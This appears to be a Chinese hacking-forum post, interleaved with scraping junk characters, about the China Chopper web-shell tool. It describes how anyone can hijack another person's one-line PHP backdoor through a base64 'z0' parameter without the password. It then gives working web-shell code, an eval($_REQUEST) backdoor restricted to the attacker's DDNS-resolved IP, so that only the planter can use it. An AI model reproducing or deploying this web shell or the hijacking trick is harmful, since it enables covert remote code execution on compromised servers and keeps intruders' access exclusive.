今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞% E) @3 Y; J& i! _
9 f. c* F3 n6 R) W就算你设置了密码,使用了eval($_REQUEST['moyo']);
' }5 ?$ b5 M" r- p7 T0 r7 v; ~1 S5 m/ S3 Y$ n
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门; [1 A+ S7 w5 c) m
1 \) g8 ]) P9 l- Z3 \. E+ j
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
" t0 x' Q3 o4 Q7 j! C
0 h* Y/ f6 M5 w/ K( r' g. |直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了; S/ z9 \( z* u" ?
" v w9 N1 `# o3 t+ i5 |7 \不知道是设计缺陷还是故意留的后门* k4 I' g# a4 l6 V! t* J) K! J2 G
* p& I+ w" H. l1 U
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
! P( W- Y W& u: W: |. s a$ ^ r; l" e- A# i" x& M' ~
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org! \. S) v" \; H
|5 m v1 E. E
然后一句话后门这样写
" M; ^ y' ?$ B1 @+ ]- ]6 g, r0 {: Z
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?> s1 @( N" n7 `; [, o
这样就可以让一句话后门只允许自己的电脑连接了
" j: ?. b0 k$ s' Y/ p0 h' s x; X
|